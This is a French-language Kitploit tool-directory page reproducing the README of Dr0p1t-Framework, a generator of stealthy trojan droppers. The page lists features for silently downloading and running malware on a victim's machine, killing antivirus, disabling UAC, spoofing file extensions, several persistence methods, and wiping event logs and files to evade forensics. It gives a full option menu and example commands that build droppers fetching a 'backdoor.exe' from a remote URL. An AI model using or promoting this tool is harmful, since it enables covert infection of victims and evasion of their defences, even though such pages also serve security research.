Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Dr0p1t-Framework — Un framework qui crée un dropper furtif avancé qui contourne la plupart des antivirus et possède de nombreuses astuces. | Kitploit
Outils/GitHubGitHub/d4vinci/dr0p1t-framework
Escalade de PrivilègesGénération de PayloadsMécanismes de PersistanceExploitationÉvasion IDS/IPSAnalyse ForensiqueHameçonnageAnalyse de MalwareCommandement et ContrôleIngénierie SocialeDéveloppement de Charges UtilesAnti-Bot
1.5k38721il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Archived
GitHubd4vinci/dr0p1t-framework

Dr0p1t-Framework

Un framework qui crée un dropper furtif avancé qui contourne la plupart des antivirus et possède de nombreuses astuces.

Voir le dépôt

Non maintenu actuellement (Attendez la prochaine version)


Dr0p1t-Framework n0where best cybersecurity tools Python 3.5 Python 2.7 Build Status

Avez-vous déjà entendu parler des trojan droppers ? En bref, un dropper est un type de malware qui télécharge d'autres malwares et Dr0p1t vous donne la possibilité de créer un dropper furtif qui contourne la plupart des antivirus et possède de nombreuses astuces (Faites-moi confiance :D ) ;)

Fonctionnalités

+ Propriétés de l'exécutable généré :

  • La taille de l'exécutable est plus petite par rapport à d'autres droppers générés de la même manière.
  • Télécharge un exécutable sur le système cible et l'exécute silencieusement.
  • Fonction d'autodestruction pour que le dropper se tue et se supprime après avoir terminé son travail.
  • Échappe à la forensique de disque en faisant en sorte que tous les fichiers créés par le dropper, ainsi que le dropper lui-même, nettoient leur contenu avant suppression.
  • Efface le journal des événements après la fin.

+ Propriétés du framework :

  • Fonctionne avec Windows, Linux et dispose désormais d'un support OSX (Merci à @sm4sh3r)
  • Fonctionnalité Dr0p1t-Server (bêta) pour pouvoir travailler depuis le navigateur Voir comment travailler avec Dr0p1t-Server
  • Dr0p1t-Server propose une option d'arnaque (bêta) Voir comment travailler avec Dr0p1t-Server

+ Modules :

  • Trouver et tuer l'antivirus avant d'exécuter le malware.
  • Possibilité de désactiver l'UAC.
  • Possibilité d'exécuter votre malware en tant qu'administrateur.
  • Usurpation complète en modifiant l'icône et l'extension du fichier selon vos souhaits.
  • Prise en charge des fichiers ZIP pour compresser votre exécutable en zip avant le téléchargement.
  • Exécution d'un fichier personnalisé (batch|powershell|vbs) que vous avez choisi avant d'exécuter l'exécutable.
  • Lors de l'exécution de scripts powershell, peut contourner la stratégie d'exécution.
  • Utilisation d'UPX pour compresser le dropper après sa création.

+ Modules de persistance :

  • Ajout de l'exécutable au démarrage après son téléchargement.
  • Ajout de l'exécutable au planificateur de tâches après son téléchargement (l'UAC n'a pas d'importance).
  • Ajout de votre fichier au profil utilisateur powershell afin que votre fichier soit téléchargé et exécuté à chaque exécution de powershell.exe s'il n'existe pas.

Captures d'écran

Sur Windows

Voir plus

Sur Linux (Kali linux)

Voir plus

Sur OSX

Pas encore entièrement testé ! Besoin de contributeurs et de testeurs 😄

Menu d'aide

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      afficher ce message d'aide et quitter
-s              ajouter votre malware au démarrage (Persistance)
-t              ajouter votre malware au planificateur de tâches (Persistance)
-a              ajouter votre lien au profil utilisateur powershell (Persistance)
-k              tuer le processus antivirus avant d'exécuter votre malware.
-b              exécuter ce script batch avant d'exécuter votre malware. Voir le dossier scripts
-p              exécuter ce script powershell avant d'exécuter votre malware. Voir le dossier scripts
-v              exécuter ce script vbs avant d'exécuter votre malware. Voir le dossier scripts
--runas         contourner l'UAC et exécuter votre malware en tant qu'administrateur
--spoof         usurper l'extension du fichier final vers celle de votre choix.
--zip           indiquer à Dr0p1t que le malware dans le lien est compressé en zip
--upx           utiliser UPX pour compresser le fichier final.
--nouac         tenter de désactiver l'UAC sur l'appareil de la victime
-i              utiliser une icône pour le fichier final. Voir le dossier icons
--noclearevent  indiquer au framework de ne pas effacer les journaux d'événements sur la machine cible après la fin.
--nocompile     indiquer au framework de ne pas compiler le fichier final.
--only32        télécharger votre malware uniquement pour les appareils 32 bits
--only64        télécharger votre malware uniquement pour les appareils 64 bits
-q              rester silencieux (pas de bannière)
-u              vérifier les mises à jour
-nd             afficher moins d'informations en sortie

Exemples

./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Prérequis

  • Python 2 ou Python 3.

La version recommandée pour Python 2 est 2.7.x, la version recommandée pour Python 3 est 3.5.x et n'utilisez pas la 3.6 car elle n'est pas encore supportée par PyInstaller

Dépendances nécessaires pour Linux

  • apt
  • D'autres seront installées à partir du fichier install.sh

Remarque : Vous devez avoir un accès root

Dépendances nécessaires pour Windows

  • pip
  • Modules dans windows_requirements.txt

Installation

Il existe ici une liste de toutes les vidéos officielles pour installer et utiliser Dr0p1t Playlist

  • Sur Linux
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • Sur Windows (après avoir téléchargé le ZIP et décompressé)
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

Remarque : sous python 2.7, vous n'avez pas pip, installez-le d'abord à partir du script get-pip.py [Recherchez-le sur Google]

Testé sur :

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Travailler avec Dr0p1t-Server

Remarque : Le serveur est encore en version bêta et possède de nombreuses fonctionnalités à ajouter ainsi qu'un meilleur design [Besoin d'un designer pour contribuer :D]

Prérequis

  • Connexion Internet stable.
  • Port 5000 non utilisé et pare-feu configuré pour ne pas bloquer les connexions sur ce port.

Installation et exécution du serveur

Sur Linux et Windows, c'est la même chose après avoir installé Dr0p1t en suivant les étapes ci-dessus. Installez les modules dans server_requirements.txt en utilisant pip comme suit :

python -m pip install -r server_requirements.txt

Lançons maintenant notre script serveur :

python Dr0p1t_Server.py

Après avoir exécuté le script serveur, il commencera à écouter toutes les connexions arrivant sur le port 5000 en utilisant Flask.

Maintenant, pour utiliser le serveur depuis votre appareil, ouvrez dans le navigateur soit 127.0.0.1:5000 soit [Votre IP]:5000.

Pour l'ouvrir depuis d'autres appareils sur le LAN, ouvrez [Votre IP locale]:5000 et pour d'autres appareils sur le WAN, ouvrez [Votre IP globale]:5000, mais assurez-vous d'abord d'avoir configuré votre routeur pour rediriger les connexions du port 5000 vers vous.

Télécharger l’outil